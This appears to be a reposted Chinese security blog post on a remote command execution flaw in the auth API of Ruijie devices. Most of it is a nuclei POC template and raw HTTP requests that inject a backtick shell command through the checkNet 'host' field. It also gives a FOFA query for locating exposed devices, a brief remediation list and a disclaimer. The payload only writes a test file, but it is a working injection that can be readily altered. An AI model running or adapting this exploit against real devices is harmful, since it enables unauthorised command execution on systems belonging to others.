漏洞描述:
锐捷系统auth接口处存在远程命令执行漏洞。攻击者可能利用此漏洞执行恶意命令,导致系统执行未授权的操作,获取服务器权限。
id: ruijie-auth-RCE
info:
name: 锐捷系统auth接口处存在远程命令执行漏洞
author: kingkong
severity: high
metadata:
fofa-query: body="cgi-bin/luci" && body="#f47f3e"
http:
- raw:
- |
POST /cgi-bin/luci/api/auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
{"method":"checkNet","params":{"host":"`echo test123>test.txt`"}}
- |
GET /cgi-bin/test.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- 'status_code_2 == 200'
- 'contains(body_2,"test123")'
condition: and
FOFA:body="cgi-bin/luci" && body="#f47f3e"
界面如下
漏洞验证
漏洞检测POC
POST/cgi-bin/luci/api/auth HTTP/1.1
Host:
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 65
{"method":"checkNet","params":{"host":"`echo test123>test.txt`"}}
GET/cgi-bin/test.txt HTTP/1.1
Host:
neclei批量检测截图
1、输入验证:对所有用户输入进行严格的验证,确保只接受预期的格式。2、使用安全的API:使用安全的库或API来执行命令,避免直接调用系统命令。3、最小权限原则:确保应用程序仅在必要的权限下运行,限制可执行的命令。4、输出编码:对输出进行编码,以防止注入攻击。
原文始发于微信公众号(脚本小子):锐捷系统auth接口处存在远程命令执行漏洞【漏洞复现|附nuclei-POC】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论